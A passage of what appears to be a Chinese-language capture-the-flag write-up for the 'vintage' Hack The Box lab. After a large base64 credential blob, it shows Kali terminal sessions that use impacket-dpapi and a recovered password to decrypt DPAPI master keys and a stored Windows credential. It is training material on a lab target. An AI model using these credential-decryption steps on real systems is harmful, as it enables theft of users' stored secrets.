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
但是我发现其实是可以下载的,这个下载失败是不影响的,同样的吧两个主密钥下载了
然后解密即可,
首先解密两个主密钥
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-dpapi masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
然后用主密钥然后解密两个blob
第一个没啥用
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2024-06-07 11:17:08
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown :
Username : 02eicexxucchzqre
Unknown :
KeyWord : Microsoft_WindowsLive:authstate:0
Data :
0000 01 00 00 00 D0 8C 9D DF 01 15 D1 11 8C 7A 00 C0 .............z..
0010 4F C2 97 EB 01 00 00 00 78 0F DC E6 0C 16 D0 46 O.......x......F
0020 AA 3E F8 BE 26 2B 76 D0 00 00 00 00 02 00 00 00 .>..&+v.........
0030 00 00 10 66 00 00 00 01 00 00 20 00 00 00 1C DB ...f...... .....
0040 BB C1 61 63 E5 05 76 62 51 7F 7E 58 19 1E 92 F4 ..ac..vbQ.~X....
0050 EA 9C 53 2C 05 AF 92 C5 EB 7C 37 1D 89 C5 00 00 ..S,.....|7.....
0060 00 00 0E 80 00 00 00 02 00 00 20 00 00 00 CD 45 .......... ....E
0070 5F 4F 5D 7A 3F E5 CD 38 F8 59 3B 9C 60 6D DF CC _O]z?..8.Y;.`m..
0080 11 9C 55 47 B8 A3 80 4D A7 8F 73 5A 80 6B 60 1E ..UG...M..sZ.k`.
0090 00 00 E3 1E 7F CA B4 FA 4E 88 86 BB 6D 35 0E CE ........N...m5..
00a0 68 29 4A B3 72 D3 05 13 FE 7E 9D 61 30 98 5A AA h)J.r....~.a0.Z.
00b0 3C FA BC A7 8A 77 80 87 5A 37 4D 53 BF 45 0B 79 <....w..Z7MS.E.y
00c0 F3 75 A7 E3 2E C3 EE 8C 1A ED 59 57 DB 98 6C 66 .u........YW..lf
00d0 1D 03 10 38 EA ED 33 3D A7 FE 31 36 71 28 2E 42 ...8..3=..16q(.B
00e0 44 37 1A 7B 45 8C 4A 5D E9 70 49 56 D0 4D CF 3C D7.{E.J].pIV.M.<
00f0 DE 21 9A 60 19 B9 E9 D8 C7 47 5C 31 AF A4 30 42 .!.`.....G\1..0B
KeyWord : Microsoft_WindowsLive:authstate:1
Data :
